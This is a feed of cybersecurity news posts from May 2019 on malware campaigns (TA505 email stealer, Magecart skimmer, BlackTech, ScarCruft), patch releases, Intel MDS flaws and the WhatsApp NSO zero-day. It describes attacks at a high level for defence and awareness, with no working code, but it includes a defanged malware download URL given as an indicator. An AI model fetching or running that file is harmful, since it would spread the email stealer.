The tool reports on potential vulnerabilities introduced during app installation. 

“This tool can play an important role in ensuring that the software you develop or deploy doesn’t adversely affect the operating system security configuration by allowing you to scan for specific types of changes,” reads a blog post published by Microsoft. 

Microsoft pointed out that the tool includes both Electron and command line interface options. The results for the command line use option are written to a local HTML or JSON file, an implementation choice that makes it easy to include the tool in the user automated toolchain.

Pierluigi Paganini

(SecurityAffairs – fingerprints, Genesis Store)

The post Microsoft renewed its Attack Surface Analyzer, version 2.0 is online appeared first on Security Affairs.

The stealthy email stealer in the TA505 hacker group’s arsenal

Experts at Yoroi-Cybaze Z-Lab observed a spike in attacks against the banking sector and spotted a new email stealer used by the TA505 hacker group

Introduction

During the last month, our Threat Intelligence surveillance team spotted increasing evidence of an operation intensification against the Banking sector. In fact, many independent researchers pointed to a particular email attack wave probably related to the known TA505 hacking group, active since 2014 and focusing on Retail and Banking companies. The group is also known for some evasive techniques they put in place over time to avoid the security controls and penetrate corporate perimeters with several kinds of malware, for instance abusing the so-called LOLBins (Living Off The Land Binaries), legit programs regularly used by victim, or also the abuse of valid cryptographically signed payloads.

Figure 1. Attack campaign spotted in the wild.

Investigating and tracking their operations during April and May we detected an interesting tool was delivered through the victim machine. Just after the opening of malicious documents and the installation of FlawedAmmy RAT implants, the group used to deploy a particular credential stealing software, part of their arsenal, revealing details of their recent operation.

Figure 2. Attack campaign spotted in the wild.

Technical Analysis

The piece of malware under analysis were downloaded from “bullettruth[.com/out[.exe”, it was executed into the victim machines after the establishment of the infection.

Sha256f3e8f68c31c86d431adea1633c875c32434a42aee5ed70af74af5c5e5aa58883
ThreatCustom Email Stealer
Brief DescriptionExecutable of the email stealer
Ssdeep12288:tlICpzmDFPJ+d7SQX5PsTrKjL43vNa77pu:XI+mDFx+d7vcrKv43X
Figure 3: Malware Signature by SLON LTD

Firstly, we noticed this secondary component was well protected against antivirus detection, in fact, the PE file was signed by Sectigo in the first half of May, one of the major Russian Certification Authority. Analyzing the trust chain we found the attackers were relying on cryptographic keys released to a UK company named  SLON LTD. At this time, we have no evidence to hypothesize it could be a victim of previous hacks or not.

Anyway, a static inspection of the binary revealed that the malware has a quite high entropy level, suggesting it may be packed.

Figure 4: Malware suspicious entropy level

Dynamically executing the malware, more information about its behaviour is revealed. The malicious executable is substantially an email stealer, in fact, the only purpose is to retrieve all the emails and passwords accounts present inside the victim machine. After executing the information gathering routine, the malware sends to its C2 all the retrieved emails and passwords:

Figure 5: HTTP POST communication

The interesting thing about the communication with the C2 is the fact that there is no encryption: the data harvested are sent to the C2 in JSON format. Investigating the attacker infrastructure we noticed interesting information such as the information of the stolen emails through our Digital Surveillance systems.

In order to retrieve more details about this Email Stealer, the analysis has moved into debugging and disassembling. As previously mentioned, the malware sample is heavily obfuscated and packed. However, by letting the malware execute itself within a debugger, we were able to extract the unpacked payload of the malware.

Figure 6: Static information about the packed sample (on the left) and the unpacked one (on the right)

As shown by the above figure, we notice a peculiarity of these two components: while the packed sample is compiled in Microsoft Visual C++ version 6.0, the unpacked one is compiled in Microsoft Visual C++ version 8. At this point, we deepen the analysis on the extracted payload. However, we are not able to execute it, because it always references many memory addresses of the original one. So, we carry on static analysis on the extracted sample.

As previously described, the malware’s principal purpose is to iterate through the filesystem looking for email accounts.. The first step is to check whether the “outlook.exe” process is running and, in this case it kills the process.The malware iterate through user processes with Process32FirstW API and then kill it with TerminateProcess:

Figure 7: Outlook process search routine

The extracted payload does not present any type of code obfuscation of other types. In fact the C2 server and the path is not encoded:

Figure 8: C2 connection routine

The last routine being analyzed is the credential harvesting inside the entire filesystem.

Apart from the routine that searches for the email account registered in Outlook and Thunderbird clients (as shown in Figure 7), there is another one which scans the filesystem looking for hardcoded extensions, then, if one of them is found, a reference to the found file is conserved inside the %TEMP% directory. At this point, all the gathered email accounts are sent to the server and then erasing  all traces of itself from the infected machine, in fact, the malware creates a simple batch script which delete itself and all the tracks of infection.

Figure 9: Autodeletion batch script

Analysis of Exposed Emails

In this paragraph are shown some statistics about the harvested emails in the attack campaign, recovered during surveillance and hunting operations. So we decided to create a graph in which sort the most frequent TLD occurrences of all the stolen data.

Figure 10: Distribution of TLD

As seen in the graph above, the most frequent TLD is .com with 193.194 occurrences, following .kr with 102.025 occurrences, .cn with 26.160 occurrences, it with 6.317 occurrences and so on. To better visualize the macro-locations involved in this exposure we built a heatmap showing the geographical distribution of the TOP 100 countries referenced in the TLDs.


Figure 11: Geolocation of emails TLD exposure

The heatmap shows the less-affected countries with a greenish color, on the contrary, the most-affected ones tend to an orange or red-tinged color. The first thing that emerges from these 2 distributions is that this specific threat seems not to be targeted, in fact, the diffusion is almost global with some red or orange zones in UK, Italy, Republic of Korea, China, Germany, Hungary, Taiwan, Japan, India and Mexico. All these countries exceeded the thousand occurrences.

Conclusion

Nowadays, the email accounts are an effective source of revenue for the cyber criminals. In fact all these information can be used to spread other malware through phishing campaigns, to perform BEC attacks (Business Email Compromise) and also to try credential stuffing attacks.

Evan a simple Info-Stealer malware like this one could be a dangerous threat, especially if used by organized groups in conjunction with other malware implants. In fact, as reported by the independent researcher Germán Fernández Bacian too, this Email Stealer has been recently used by the infamous TA505 hacking group. This link means, with good confidence, the exposed data, full email accounts in some cases and email contacts in general, are now available to a cyber-criminal group who launched targeted attacks against Banks and Retail industries in the near past.

Technical details, including IoCs and Yara Rules, are available in the analysis published on the Yoroi blog.

https://blog.yoroi.company/research/the-stealthy-email-stealer-in-the-ta505-arsenal/

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – TS505, malware)

The post The stealthy email stealer in the TA505 hacker group’s arsenal appeared first on Security Affairs.

Magecart hackers inject card Skimmer in Forbes Subscription Site

The Magecart gang made the headlines again, the hackers this time compromised the Forbes magazine subscription website.

The Magecart group is back, the hackers this time compromised injected a skimmers script into the Forbes magazine subscription website.

The malicious traffic was spotted by the security expert Troy Mursch
Chief Research Officer of Bad Packets, on Wednesday.

Magecart forbes magazine

Magecart hackers have installed malicious JavaScript skimmer on forbesmagazine.com to siphon payment card data entered into the site by subscribers. Crooks injected an obfuscated JavaScript in the HTML code of the payment section, the script decoded is here.

The expert immediately attempted to report his discovery to Forbes via email, but without success.

The payment page was taken down at around 1400 UTC and it is still offline at the time of writing.

A Forbes spokesperson told El Reg that is investigating the incident and that at this stage, it is not aware of the theft of any customers’ credit card information. Recent subscribers should remain vigilant and check their credit card statements for signs of fraudulent activities.

Forbes was likely a victim of a supply chain attack, Magecart hackers have compromised a company that provides services to the media outlet.

During the weekend, the forensic expert Willem de Groot discovered that the records of customers of Picreel, a web marketing software supplier, had been leaked online.

Forbes is one of the customers of Picreel, and Magecart hackers used the leaked data to access Forbes infrastructure and install the skimmer script.

“Last weekend, security researchers surfaced new supply-chain attacks involving Magecart web-skimmers placed on several web-based suppliers, including AdMaxim, CloudCMS, and Picreel. The breaches were part of a large-scale attack that hit a breadth of providers simultaneously intending to access as many websites as possible.” reads the analysis published RiskIQ.

Thousands of other companies that are customers at Picreel are at risk, potentially affected domains are listed here.

Security firms have monitored the activities of a dozen Magecart groups at least since 2015. The gangs use to implant skimming script into compromised online stores in order to steal payment card data, but they are quite different from each other.

According to a joint report published by RiskIQ and FlashPoint in March, some groups are more advanced than others. The list of victims of Magecart groups is long and includes several major platforms such as British AirwaysNeweggTicketmaster, and Feedify​​

Recently the Magecart group stole payment card details from the e-commerce system used by colleges and universities in Canada and the US.

Pierluigi Paganini

(SecurityAffairs – Magecart, Forbes)

The post Magecart hackers inject card Skimmer in Forbes Subscription Site appeared first on Security Affairs.

BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor

The BlackTech cyber-espionage group exploited the ASUS update process for WebStorage application to deliver the Plead backdoor.

The cyber espionage group tracked as BlackTech compromised the ASUS update process for WebStorage application to deliver the Plead backdoor.

The BlackTech group was first observed by ESET on July 2018, when it was abusing code-signing certificates stolen from D-Link for the distribution of the Plead backdoor that has been in the wild since at least 2012.

According to the experts, the cyber espionage group is highly skilled and most of its victims are in the East Asia region, particularly Taiwan.

At the end of April 2019, experts from ESET observed observed multiple attempts to deploy the Plead backdoor. In the attacks observed by the researhcers, the Plead backdoor was created and executed by a legitimate process named AsusWSPanel.exe that is associated with the Windows client for a cloud storage service called ASUS WebStorage. The executable file used in the attack is digitally signed by ASUS Cloud Corporation.

Experts noticed that all observed samples of the Plead backdoor had the file name ‘Asus Webstorage Upate.exe.’ Experts discovered that
during the software update process, the AsusWSPanel.exe module of ASUS WebStorage can create files with such filenames.

Threat actors might have had access to the update mechanism a circumstance that suggest two attack scenarios:

  • Hackers hack compromise the supply chain for the ASUS WebStorage cloud service;
  • Hackers were in the position to carry out a MITM attack, given that WebStorage binaries are delivered via HTTP during the update process. 

Experts believe that the second scenario is more plausible updates for the
ASUS WebStorage software are not provided through a secure connection and the process lack of validation for the binaries downloaded.

“The ASUS WebStorage software is vulnerable to a man-in-the-middle attack (MitM).” reads the advisory published by ESET. “Namely, the software update is requested and transferred using HTTP; once an update is downloaded and ready to execute, the software doesn’t validate its authenticity before execution. Thus, if the update process is intercepted by attackers, they are able to push a malicious update.”

Experts from ESET noticed that most of the affected organizations have routers made by the same vendor and their admin panels are exposed online. It is likely that attackers compromised the routers to carry out a MitM attack.

Plead backdoor

During the update mechanism for ASUS WebStorage, the client sent a request to the server to request the update, in turn the server responds in XML format, with a guid and a link included in the response. The software then checks if the installed version is older, based on the information in the guid element, and requests the update binary via the provided link. 

“Therefore, attackers could trigger the update by replacing these two elements using their own data. This is the exact scenario we actually observed in the wild. attackers inserted a new URL, which points to a malicious file at a compromised gov.tw domain,” says ESET. 

The attackers serve a Plead sample that acts as a first-stage downloader that fetches a fav.ico file from a server, whose name mimics the official ASUS WebStorage server. The downloaded file contains a PNG image and data used by the malware, which is located right after PNG data

The second-stage loader writes itself to the Start Menu startup folder to gains persistence. The loader executes shellcode in memory to load the third-stage DLL, the TSCookie.

“We see that supply-chain and man-in-the-middle attacks are used more and more often by various attackers all around the globe.” ESET concludes.  “This is why it’s very important for software developers not only to thoroughly monitor their environment for possible intrusions, but also to implement proper update mechanisms in their products that are resistant to MitM attacks,”

Pierluigi Paganini

(SecurityAffairs – Plead Backdoor, Zero-day, BlackTech group)

The post BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor appeared first on Security Affairs.

SAP Security Patch Day for May 2019 fixes many missing authorization checks

SAP released SAP Security Patch Day for May 2019 that includes 8 Security Notes, 5 of which are updates to previously released Notes.

Five Security Notes included in SAP Security Patch Day for May 2019 addressed missing authorization checks in SAP products, including Treasury and Risk Management, Solution Manager and ABAP managed systems, dbpool administration, and Enterprise Financial Services. 

“Today, being the second Tuesday of the month, SAP released May’s Security Notes. This month, there are no critical or Hot News notes published, but there are three High Priority Notes, as well as two other SAP Security Notes affecting SAP Solution Manager (reported by the Onapsis Research Labs).” reads a blog post published by SAP security firm Onapsis. “This month, 50% of the patches are Missing Authorization Checks, which is higher than the average 15%. Even though this is one of the most common vulnerabilities in SAP software.”

SAP Security Patch Day May 2019

SAP also released five Security Notes to address information disclosure vulnerabilities in several products, including BusinessObjects and Solution Manager. 

The Security Note is related to a privilege escalation issue (CVE-2019-0301) in SAP Identity Management REST Interface Version, this is the only Note rated as High priority, while the remaining 12 are rated Medium.

“Under certain conditions, it is possible to request the modification of role or privilege assignments through SAP Identity Management REST Interface Version 2, which would otherwise be restricted only for viewing.” reads the security advisory for the CVE-2019-0301.

This is the most severe flaw, it received a CVSS score of 8.4.

Two flaws received a CVSS score of 6.3, they are an information disclosure in BusinessObjects business intelligence platform (CVE-2019-0287), and a missing authorization check in Treasury and Risk Management (CVE-2019-0280).

SAP published updates for Security Notes released in October 2009, September 2010, December 2010, and March 2013.

“A total of 11 Security Notes were published in May and an additional three in late April after last month’s Patch Tuesday, represented in these types: Missing Authorization Checks (the most common type of vulnerability in SAP software), Information Disclosure, Cross-Site Scripting (XSS) and Privilege Escalation.” adds Onapsis.

Pierluigi Paganini

(SecurityAffairs – SAP Security Patch Day for May 2019)

The post SAP Security Patch Day for May 2019 fixes many missing authorization checks appeared first on Security Affairs.

Twitter inadvertently collected and shared iOS location data

Twitter confirmed revealed that a bug in its iOS app it the root cause for an inadvertent collection of location data and sharing it with a third-party.

A new story of a violation of the user’s privacy made the lines, Twitter revealed that due to a bug is collected and shared iOS location data with a third-party advertising company,

Fortunately, only one partner of the micro-blogging firm was involved and the data collection and sharing occurred in certain circumstances.

“We have discovered that we were inadvertently collecting and sharing iOS location data with one of our trusted partners in certain circumstances.” reads the security advisory published by Twitter.

“Specifically, if you used more than one account on Twitter for iOS and opted into using the precise location feature in one account, we may have accidentally collected location data when you were using any other account(s) on that same device for which you had not turned on the precise location feature,”

Twitter admitted having failed into removing the location data from the information shared with the trusted advertising partner that was accessing it during real-time bidding process. 

The company pointed out that location data its shared could not be used to track individuals because it had implemented technical measures to “fuzz” the information. Twitter explained that shared was no more precise than zip code or city (5km squared).

Twitter did not share users’ handles or other unique account IDs, this means that it was impossible to link the identity of a specific user to a geographic location. 

“The partner did not receive data such as your Twitter handle or other unique account IDs that could have compromised your identity on Twitter.” continues the announcement.

“This means that for people using Twitter for iOS who we inadvertently collected location information from, we may also have shared that information with a trusted advertising partner,”

Another good news is that the partner did not retain the data that was deleted “as part of their normal process.” 

Twitter

Twitter has already fixed the issue and notified the incident to all the impacted users, anyway it did not reveal the extent of the incident either for how long it shared the data with its partner.

“We invite you to check your privacy settings to make sure you’re only sharing the data you want to with us. We’re very sorry this happened. We recognize and appreciate the trust you place in us and are committed to earning that trust every day,” concludes Twitter.

Pierluigi Paganini

(SecurityAffairs – privacy, data leak)

The post Twitter inadvertently collected and shared iOS location data appeared first on Security Affairs.

Microsoft Patch Tuesday addresses dangerous RDS flaw that opens to WannaCry-like attacks

Microsoft Patch Tuesday updates for May 2019 address nearly 80 vulnerabilities, including an RDS flaw allowing WannaCry-Like attacks.

Microsoft Patch Tuesday updates for May 2019 address nearly 80 vulnerabilities, including a Windows zero-day flaw and an RDS vulnerability that can be exploited to carry out WannaCry-like attack.

The zero-day vulnerability addressed by Microsoft Patch Tuesday updates for May 2019 is a privilege escalation flaw related to the way the Windows Error Reporting (WER) system handles files. The vulnerability tracked as CVE-2019-0863 could be exploited by an attacker with low-privileged access to the targeted system to deliver a malware.

“An elevation of privilege vulnerability exists in the way Windows Error Reporting (WER) handles files. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with administrator privileges.” reads the security advisory published by Microsoft.

“To exploit the vulnerability, an attacker must first gain unprivileged execution on a victim system.”

The vulnerability was reported by experts at Palo Alto Networks and an expert who online with the moniker “Polar Bear.”

RDP flaw Microsoft Patch Tuesday

Microsoft Patch Tuesday updates for May 2019 also addresses a remote code execution flaw in Remote Desktop Services (RDS). The flaw tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker by connecting to the targeted system via the Remote Desktop Protocol (RDP) and sending specially crafted requests.

“A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests.” reads the security advisory published by Microsoft. “This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

“To exploit this vulnerability, an attacker would need to send a specially crafted request to the target systems Remote Desktop Service via RDP.”

It is important to highlight that the RDP itself is not vulnerable.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities. It could be exploited by unautheticated attacker and without users interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

The thought is for the WannaCry attack.

“This vulnerability is pre-authentication and requires no user interaction. In other words, the vulnerability is ‘wormable’, meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017.” reads a blog post published by Microsoft. “While we have observed no exploitation of this vulnerability, it is highly likely that malicious actors will write an exploit for this vulnerability and incorporate it into their malware.”

The vulnerability doesn’t affect Windows 8 and Windows 10, anyway previous versions are exposed to the risk of cyber attacks.

Microsoft Patch Tuesday updates for May 2019 also address vulnerabilities in Windows OS, Internet Explorer, Edge, Microsoft Office, and Microsoft Office Services and Web Apps, ChakraCore, .NET Framework, and ASP.NET, Skype for Android, Azure DevOps Server, and the NuGet Package Manager.

Microsoft released security updates for Windows 7, Windows Server 2008 R2, and Windows Server 2008, The tech giant has also separately released patches for out-of-support versions of Windows such as Windows 2003 and Windows XP.

18 vulnerabilities have been rated as critical and rest Important in severity. 

Microsoft also advised Windows Server users to block TCP port 3389 and enable Network Level Authentication to prevent any unauthenticated attacker from exploiting this vulnerability.

Pierluigi Paganini

(SecurityAffairs – Windows, RDP)

The post Microsoft Patch Tuesday addresses dangerous RDS flaw that opens to WannaCry-like attacks appeared first on Security Affairs.

Adobe patches over 80 flaws in Flash, Acrobat Reader, and Media Encoder

Adobe Patch Tuesday updates for May 2019 address a critical flaw in Flash Player and more than 80 vulnerabilities in Acrobat products.

Adobe Patch Tuesday updates for May 2019 address a total of 84 vulnerabilities in Acrobat and Acrobat Reader products for Windows and macOS.

The tech company addressed many critical vulnerabilities in its products, including heap overflow, buffer error, double free, use-after-free, type confusion, and out-of-bounds write issues that can be exploited to execute arbitrary code on vulnerable systems.

The list of vulnerabilities addressed by Adobe also includes several out-of-bounds read issues that can lead to information disclosure.

The good news is that none of the vulnerabilities patched by Adobe Patch Tuesday updates for May 2019 has been exploited in attacks in the wild.
According to the priority ratings assigned by Adobe to the flaws, the risk of exploitation in the near future is low.

Adobe fixed a critical use-after-free vulnerability in Flash Player that can be exploited to execute arbitrary code in the context of the targeted user.

The issue tracked as CVE-2019-7837 affects Windows, macOS, Linux, and Chrome OS versions of the popular software. The vulnerability was reported to Adobe by an anonymous researcher via Trend Micro’s Zero Day Initiative (ZDI).

Adobe also fixed a critical file parsing vulnerability that can lead to remote code execution.

Adobe Patch Tuesday

Adobe also released Media Encoder version 13.1 that addresses two security vulnerabilities, a critical issue tracked as CVE-2019-7842 that can leads to remote code execution and an information disclosure flaw.

Pierluigi Paganini

(SecurityAffairs – Adobe, Adobe Patch Tuesday updates May 19)

The post Adobe patches over 80 flaws in Flash, Acrobat Reader, and Media Encoder appeared first on Security Affairs.

Millions of computers powered by Intel chips are affected by MDS flaws

Millions of computers powered by Intel processors are affected by a new class of vulnerabilities (MDS) that can leak potentially sensitive data.

Researchers from multiple universities and security firms discovered a new class of speculative execution side-channel vulnerabilities that could be exploited with new side-channel attack methods dubbed Fallout, RIDL (Rogue In-Flight Data Load), and ZombieLoad.

“On May 14, 2019, Intel and other industry partners shared details and information about a new group of vulnerabilities collectively called Microarchitectural Data Sampling (MDS).” reads a post published by Intel.

“Under certain conditions, MDS provides a program the potential means to read data that program otherwise would not be able to see,” “MDS techniques are based on a sampling of data leaked from small structures within the CPU using a locally executed speculative execution side channel. Practical exploitation of MDS is a very complex undertaking. MDS does not, by itself, provide an attacker with a way to choose the data that is leaked.”

The new class of flaws, dubbed Microarchitectural Data Sampling (MDS attacks), includes four different flaws that could be triggered to leak arbitrary in-flight data from CPU-internal buffers, such as Line Fill Buffers, Load Ports, or Store Buffers.

“MDS may allow a malicious user who can locally execute code on a system to infer the values of protected data otherwise protected by architectural mechanisms.” reads the secuirty advisory published by Intel. “Refer to the MDS table in Deep dive: CPUID Enumeration and Architectural MSRs for a list of processors that may be affected by MDS. MDS only refers to methods that involve microarchitectural structures other than the level 1 data cache (L1D) and thus does not include Rogue Data Cache Load (RDCL) or L1 Terminal Fault (L1TF). “

Below the list of vulnerabilities in Intel processors:

  1. CVE-2018-12126—Microarchitectural Store Buffer Data Sampling (MSBDS), also known as Fallout attack.
  2. CVE-2018-12130—Microarchitectural Fill Buffer Data Sampling (MFBDS), also known as Zombieload, or RIDL (Rogue In-Flight Data Load).
  3. CVE-2018-12127—Microarchitectural Load Port Data Sampling (MLPDS), also part of RIDL class of attacks.
  4. CVE-2019-11091—Microarchitectural Data Sampling Uncacheable Memory (MDSUM), also part of RIDL class of attacks.
MDS flaws

The attacks are similar to the Meltdown and Spectre attacks disclosed in January 2018.

The attacks work against most of the systems running up to Intel CPUs made in the past decade, the methods can cause the leak of sensitive information, such as passwords, disk encryption keys and browser history.

The flaws can be exploited remotely via JavaScript code and rogue websites or using exploited using malware that infected the targeted devices.

Intel revealed that the flaws were initially discovered by its experts and partners, and later reported by third-party researchers, including academics from the University of Michigan, Worcester Polytechnic Institute, Graz University of Technology, imec-DistriNet, KU Leuven, University of Adelaide, Microsoft, the VUSec group at VU Amsterdam, Bitdefender, Oracle, and Qihoo 360.

Newer chips, including some 8th and 9th generation Core processors and 2nd generation Xeon Scalable processors, address the above flaws in hardware. Intel already provided for some products microcode updates that address the flaws.

Unlike security updated for Meltdown and Spectre, the security patches for the MDS flaws should have minimal impact on the performance of most of the PCs. We cannot exclude a performance degradation in the case of data center.

Researchers published several research papers (i.e. RIDL, Fallout, ZobieLoad), c) and set up a dedicated website for the attack methods. They also released working PoC code and Video PoC demonstrating the exploitation of the flaws.

Experts also released Windows and Linux tools to test systems against RIDL and Fallout attacks as well as other speculative execution vulnerabilities.

Tech giants already published security advisories for the vulnerabilities, including MicrosoftGoogleApple, and Linux distributions. Microsoft, Google, Apple, and HP have already announced the implementation of measures to mitigate potential attacks.

ARM and AMD processors are not affected. 

Pierluigi Paganini

(SecurityAffairs – MDS, Hacking)

The post Millions of computers powered by Intel chips are affected by MDS flaws appeared first on Security Affairs.

North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal

The North Korea-linked APT group ScarCruft (aka APT37 and Group123) continues to expand its arsenal by adding a Bluetooth Harvester.

North Korea-linked APT group ScarCruft (aka APT37, Reaper, and Group123) continues to expand its arsenal by adding a Bluetooth Harvester.

ScarCruft has been active since at least 2012, it made the headlines in early February 2018 when researchers revealed that the APT group leveraged a zero-day vulnerability in Adobe Flash Player to deliver malware to South Korean users.

Kaspersky first documented the operations of the group in 2016. Cyber attacks conducted by the APT37 group mainly targeted government, defense, military, and media organizations in South Korea.

FireEye linked the APT37 group to the North Korean government based on the following clues:

  • the use of a North Korean IP;
  • malware compilation timestamps consistent with a developer operating in the North Korea time
    zone (UTC +8:30) and follows what is believed to be a typical North Korean workday;
  • objectives that align with Pyongyang’s interests(i.e. organizations and individuals involved in Korean
    Peninsula reunification efforts);

Researchers from FireEye revealed that the nation-state actor also targeted entities in Japan, Vietnam, and even the Middle East in 2017. The hackers targeted organizations in the chemicals, manufacturing, electronics, aerospace, healthcare, and automotive sectors.

Past attacks associated with the ScarCruft APT group involved zero-day vulnerabilities, anyway Kaspersky researchers pointed out that threat actors also used public exploits in its campaigns.

On April 2018, ScarCruft APT added a more advanced variant of an Android Trojan, dubbed KevDroid, to its arsenal.

Now Kaspersky Lab experts discovered that ScarCruft is using a “rare” Bluetooth device harvester.

Kaspersky found several victims of a recent campaign in investment and trading companies in Vietnam and Russia.

“We believe they may have some links to North Korea, which may explain why ScarCruft decided to closely monitor them. ScarCruft also attacked a diplomatic agency in Hong Kong, and another diplomatic agency in North Korea.” reads the analysis published by Kaspersky Lab. “It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes.”

scarcruft bluetooth harvester 2

“The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration.” continues the analysis.

“We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester. This malware is responsible for stealing Bluetooth device information.”

The Bluetooth Harvester is delivered by a downloader, it leverages the Windows Bluetooth APIs to collect information on the devices connected via Bluetooth to the compromised system.

The tool gathers several data including device name, address, class, and whether the device is connected, authenticated and remembered.

The dropper used to deliver the Bluetooth Harvester exploits a privilege escalation (CVE-2018-8120) or leverage the UACME method to bypass the Windows User Account Control (UAC) feature. Then the malware executes an installer that creates another downloader that retrieves a final payload hidden inside an image file.

“The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload. In order to evade network level detection, the downloader uses steganography. The downloaded payload is an image file, but it contains an appended malicious payload to be decrypted.” continues Kaspersky.

scarcruft bluetooth harvester

The final payload was a backdoor tracked by Cisco as ROKRAT that is used to download and execute other malware, execute commands, and exfiltrate data.

Kaspersky experts also discovered some overlaps with other APT groups, DarkHotel and KONNI. One of the devices infected with ScarCruft malware was previously compromised by a variant of KONNI and a few days earlier by the GreezeBackdoor, a malware belonging to DarkHotel’s arsenal.

“The ScarCruft has shown itself to be a highly-skilled and active group. It has a keen interest in North Korean affairs, attacking those in the business sector who may have any connection to North Korea, as well as diplomatic agencies around the globe.” concludes Kaspersky. “Based on the ScarCruft’s recent activities, we strongly believe that this group is likely to continue to evolve.”

Pierluigi Paganini

(SecurityAffairs – ScarCruft, Bluetooth Harvester)

The post North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal appeared first on Security Affairs.

Malware Training Sets: FollowUP

The popular expert Marco Ramilli provided a follow up to its Malware classification activity by adding a scripting section which would be useful for several purposes.

On 2016 I was working hard to find a way to classify Malware families through artificial intelligence (machine learning). One of the first difficulties I met was on finding classified testing set in order to run new algorithms and to test specified features. So, I came up with this blog post and this GitHub repository where I proposed a new testing-set based on a modified version of Malware Instruction Set for Behavior-Based Analysis, also referred as MIST. Since that day I received hundreds of emails from students, researchers and practitioners all around the world asking me questions about how to follow up that research and how to contribute to expanding the training set.

malware

I am so glad that many international researches used my classified Malware dataset as building block for making great analyses and for improving the state of the art on Malware research. Some of them are listed here, but many others papers, articles and researches have been released (just ask to Google).

Today I finally had chance to follow-it-up by adding a scripting section which would be useful to: (i) generate the modified version of MIST files (the one in training sets) and to (ii) convert the obtained results to ARFF (Attribute Relation File Format) by University of Waikato. The first script named mist_json.py is a reporting module that could be integrated into a running CuckooSandBox environment. It is able to take the cuckoo report and convert it into a modified version of MIST file. To do that, drop mist_json.py into your running instance of CuckooSandbox V1 (modules/reporting/) and add the specific configuration section into conf/reporting.conf. You might decide to force its execution without configuration by editing directly the source code. The result would be a MIST file for each Cuckoo analysed sample. The MIST file wraps out the generated features as described into the original post here. By using the second script named fromMongoToARFF.py you can convert your JSON object into ARFF which would be very useful to be imported into WEKA for testing your favorite algorithms.

Now, if you wish you are able to generate training sets by yourself and to test new algorithms directly into WEKA. The creation process follows those steps:

  • Upload the samples into a running CuckooSanbox patched with
    mist_json.py
  • The mist_json.py produces a MIST.json file for each submitted sample
  • Use a simple script to import your desired MIST.json files into a MongoDB. For example for i in */.json; do; mongoimport –db test –collection test –file $i; done;
  • Use the fromMongoToARFF.py to generate ARFF
  • Import the generated ARFF into Weka
  • Start your experimental sessions

If you want to share with the community your new MIST classified files please feel free to make pull requests directly on GitHubEverybody is using this set will appreciate it.

The original post along many other interesting analysis are available on the Marco Ramilli blog:

https://marcoramilli.com/2019/05/14/malware-training-sets-followup/

About the author: Marco Ramilli, Founder of Yoroi

This image has an empty alt attribute; its file name is ramilli.jpeg

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

This image has an empty alt attribute; its file name is yoroi.png

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Pierluigi Paganini

(SecurityAffairs – malware, artificial intelligence)

The post Malware Training Sets: FollowUP appeared first on Security Affairs.

WhatsApp zero-day exploited in targeted attacks to deliver NSO spyware

Facebook fixed a critical zero-day flaw in WhatsApp that has been exploited to remotely install spyware on phones by calling the targeted device.

Facebook has recently patched a critical zero-day vulnerability in WhatsApp, tracked as CVE-2019-3568, that has been exploited to remotely install spyware on phones by calling the targeted device.

WhatsApp did not name the threat actor exploiting the CVE-2019-3568, it described the attackers as an “advanced cyber actor” that targeted “a select number of users.”

“A buffer overflow vulnerability in WhatsApp VOIP stack allowed remote code execution via specially crafted series of SRTCP packets sent to a target phone number.” reads the description provided by Facebook.

The WhatsApp zero-day vulnerability is a buffer overflow issue that affects the WhatsApp VOIP stack. The flaw could be exploited by a remote attacker to execute arbitrary code by sending specially crafted SRTCP packets to the targeted mobile device.

Facebook fixed the issue with the release of WhatsApp for Android 2.19.134, WhatsApp Business for Android 2.19.44, WhatsApp for iOS 2.19.51, WhatsApp Business for iOS 2.19.51, WhatsApp for Windows Phone 2.18.348, and WhatsApp for Tizen 2.18.15. Any prior version of the popular instant messaging app is vulnerable. The company also implemented a server-side patch that was deployed at the end of last week.

WhatsApp zero-day

The bad news is that experts are aware of attacks exploiting the WhatsApp zero-day to deliver surveillance software.

The Financial Times reported that the WhatsApp zero-day has been exploited by threat actors to deliver the spyware developed by surveillance firm NSO Group.

The surveillance software developed by NSO Group was used by government organizations worldwide to spy on human rights groups, activists, journalists, lawyers, and dissidents. Security experts have detected and analyzed some of the tools in its arsenals, such as the popular Pegasus spyware (for iOS) and Chrysaor (for Android). Chrysaor was used in targeted attacks against journalists and activists, mostly located in Israel, other victims were in Georgia, Turkey, Mexico, the UAE and other countries. Experts believe the Chrysaor espionage 

In September, a report published by Citizen Lab revealed that the NSO Pegasus spyware was used against targets across 45 countries worldwide.

In November, Snowden warned of abuse of surveillance software that also had a role in the murder of the Saudi Arabian journalist Jamal Khashoggi.

